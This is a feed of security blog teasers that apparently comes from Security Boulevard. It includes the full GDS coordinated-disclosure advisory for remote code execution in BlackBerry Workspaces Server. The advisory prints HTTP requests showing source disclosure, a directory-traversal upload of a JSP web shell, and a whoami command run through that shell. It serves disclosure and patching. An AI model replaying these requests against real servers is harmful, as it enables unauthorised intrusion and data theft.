Clean IT Up: Cyber Hygiene Controls Tips

October is national cybersecurity awareness month, and with the recent examples of hacks at Equifax and Sonic as well as the realization that 3 billion Yahoo accounts have been breached, we all are likely feeling a little dirty. So, I decided to share my perspectives on cyber hygiene. The dictionary defines hygiene as “conditions or […]… Read More

The post Clean IT Up: Cyber Hygiene Controls Tips appeared first on The State of Security.

The post Clean IT Up: Cyber Hygiene Controls Tips appeared first on Security Boulevard.

from Clean IT Up: Cyber Hygiene Controls Tips

Advertisements

Women in Information Security: Katherine Teitler

Last time, I spoke with Tarah Wheeler, who is a technology and cybersecurity executive, entrepreneur, hacker, keynote speaker, scientist, and author. She’s also the author of Women in Tech: Take Your Career to the Next Level with Practical Advice and Inspiring Stories. This time I spoke to Katherine Teitler. She’s the director of content at […]… Read More

The post Women in Information Security: Katherine Teitler appeared first on The State of Security.

The post Women in Information Security: Katherine Teitler appeared first on Security Boulevard.

from Women in Information Security: Katherine Teitler

Partner Story: Discovering an AD Alternative

For small to medium businesses, Microsoft Active Directory is rarely the most cost effective solution for an identity management solution. That’s why IT consultants increasingly recommended JumpCloud’s Directory-as-a-Service® to their…

The post Partner Story: Discovering an AD Alternative appeared first on JumpCloud.

The post Partner Story: Discovering an AD Alternative appeared first on Security Boulevard.

from Partner Story: Discovering an AD Alternative

20 Questions to Ask Yourself before Giving a Security Conference Talk

Ever sit through a security conference talk that made you shake your head?  Ever wish the speaker had taken the time to verify that the talk would hit the mark?  Whether or not you have, I’m guessing you might get a kick out of my latest DarkReading piece: https://www.darkreading.com/careers-and-people/20-questions-to-ask-yourself-before-giving-a-security-conference-talk/a/d-id/1330124.  Hope you enjoy.

The post 20 Questions to Ask Yourself before Giving a Security Conference Talk appeared first on Security Boulevard.

from 20 Questions to Ask Yourself before Giving a Security Conference Talk

The Threat Landscape Expands

An October to remember, and the month is only halfway done. So far, we’ve got Russian and North Korean spies, Swedish DDoS’ers, an evil software company that is about to go out of business, politicians that don’t understand encryption trying to regulate encryption and some of the most amazingly stupid things some otherwise bright and […]

The post The Threat Landscape Expands appeared first on Netswitch Technology Management.

The post The Threat Landscape Expands appeared first on Security Boulevard.

from The Threat Landscape Expands

Cybersecurity: The Next 7 Years

The last five to seven years in Cybersecurity have been all about threat detection within conventional IT networks. The platforms have evolved from simple SIEMs with Anti-Virus protection to advanced SIEMs bolstered by behavioral analytics, active threat intelligence and threat management and recently to managed detection and response capabilities grounded in artificial intelligence and machine […]

The post Cybersecurity: The Next 7 Years appeared first on Netswitch Technology Management.

The post Cybersecurity: The Next 7 Years appeared first on Security Boulevard.

from Cybersecurity: The Next 7 Years

Russia Witch-Hunt Attacks Wrong Target

According to headlines, we just learned that “Russia hacked NSA documents with aid from antivirus software.”  What actually happened was that a hacking group alleged to be Russian bad guys somehow managed to hack through a vulnerability in Kaspersky anti-virus software to steal sensitive information on a home PC. The headline should have read ”NSA […]

The post Russia Witch-Hunt Attacks Wrong Target appeared first on Netswitch Technology Management.

The post Russia Witch-Hunt Attacks Wrong Target appeared first on Security Boulevard.

from Russia Witch-Hunt Attacks Wrong Target

Remote Code Execution in BlackBerry Workspaces Server

Overview

Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside of the server’s webroot.

CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.

BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006

Vulnerable Versions

The following Workspaces Server components are known to be vulnerable:

  • Appliance-X versions 1.11.2 and earlier
  • vApp versions 5.6.0 to 5.6.6
  • vApp versions 5.5.9 and earlier

Timeline

  • 5/10/17 – CVE-2017-9367 and CVE-2017-9368 disclosed to BlackBerry.
  • 5/10/17 – BlackBerry acknowledges receiving our report.
  • 5/16/17 – BlackBerry confirms that an investigation has started.
  • 6/6/17 – BlackBerry confirms the reported security vulnerabilities and communicates that they will be issuing two CVEs.
  • 6/28/17 – BlackBerry confirms that development has started on fixes for the two reported vulnerabilities, requests delay of disclosure.
  • 9/6/17 – BlackBerry states that their advisory is expected to be made on September 12th.
  • 9/7/17 – BlackBerry states that their advisory will need to be pushed back until October 10th, requests additional delay of disclosure.
  • 9/13/17 – BlackBerry requests additional delay of disclosure to October 16th.
  • 10/16/17 – GDS and BlackBerry coordinated disclosure.

GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.

Issue Description

The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).

Reproduction Request #1

GET /fileserver/main.js HTTP/1.1
Host: [REMOVED BY GDS]

Reproduction Response #1

HTTP/1.1 200 OK
[..snip..]

By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).

Reproduction Request #2

POST /fileserver/saveDocument HTTP/1.1
[..snip..]
Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159
Content-Length: 1286
 
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uuid"
 
/../../mnt/filespace/0/whiteLabel/
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="fileName"
 
shell.jsp
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="store"
 
local
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uploadFile"; filename="test"
 
[..snip..]
-----------------------------1484231460308104668732082159--

Reproduction Response #2

HTTP/1.1 200 OK
[..snip..]
 
{"success":"true"}

Reproduction Request #3

GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1
[..snip..]

Reproduction Response #3

HTTP/1.1 200 OK
[..snip..]
 
<pre>Command was: <b>whoami</b>
 
watchdox
</pre>

Impact

CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).

CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspace Server’s database and compromise highly sensitive information.

Remediation

GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:

  • Appliance-X version 1.12.0 and later
  • Appliance-X version 1.11.3 and later
  • vApp version 5.7.2 and later
  • vApp version 5.6.7 and later
  • vApp version 5.5.10 and later

The post Remote Code Execution in BlackBerry Workspaces Server appeared first on Security Boulevard.

from Remote Code Execution in BlackBerry Workspaces Server

A week in security (October 9 – October 15)

A compilation of notable security news and blog posts from Monday, October 9 to Sunday, October 15. We presented our quarterly report, won security awards, and lots more.

Categories:

Tags:

(Read more…)

The post A week in security (October 9 – October 15) appeared first on Malwarebytes Labs.

The post A week in security (October 9 – October 15) appeared first on Security Boulevard.

from A week in security (October 9 – October 15)